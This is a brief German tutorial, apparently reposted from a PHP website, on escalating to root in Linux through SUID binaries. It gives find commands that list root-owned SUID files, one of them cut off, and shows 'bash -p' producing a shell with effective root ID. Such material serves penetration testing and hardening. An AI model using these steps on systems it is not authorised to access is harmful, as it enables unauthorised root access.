SUID ist ein Berechtigungsmechanismus in Linux. Wenn eine Datei mit dieser Berechtigung ausgeführt wird, erhält der Aufrufer vorübergehend die Berechtigungen des Eigentümers der Datei. Wenn Sie über SUID-Berechtigungen verfügen, können Sie Binärdateien und Tools im System verwenden, um eine Eskalation der Root-Rechte durchzuführen.
Mit dem folgenden Befehl können alle ausführbaren SUID-Dateien ermittelt werden, die auf dem System ausgeführt werden. Insbesondere versucht der Befehl, Dateien mit einer SUID zu finden, die über Root-Berechtigungen verfügt.
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls
Alle oben genannten Binärdateien werden mit Root-Benutzerberechtigungen ausgeführt, da ihre Berechtigungen „s“ enthalten und den Root-Berechtigungen entsprechen.
Bash
Der folgende Befehl öffnet eine Bash-Shell mit Root-Rechten.
bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
Das obige ist der detaillierte Inhalt vonSo verwenden Sie SUID zur Eskalation von Berechtigungen unter Linux. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!
